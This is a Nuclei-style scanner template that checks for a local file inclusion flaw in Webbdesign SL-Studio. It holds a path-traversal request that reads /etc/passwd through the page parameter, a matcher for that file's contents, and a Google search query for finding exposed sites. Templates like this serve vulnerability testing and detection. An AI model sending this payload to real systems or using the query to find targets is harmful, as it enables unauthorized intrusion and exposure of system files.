id: sl-studio-lfi

info:
  name: Webbdesign SL-Studio - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Webbdesign SL-Studio is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018110187
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    google-query: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
  tags: slstudio,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
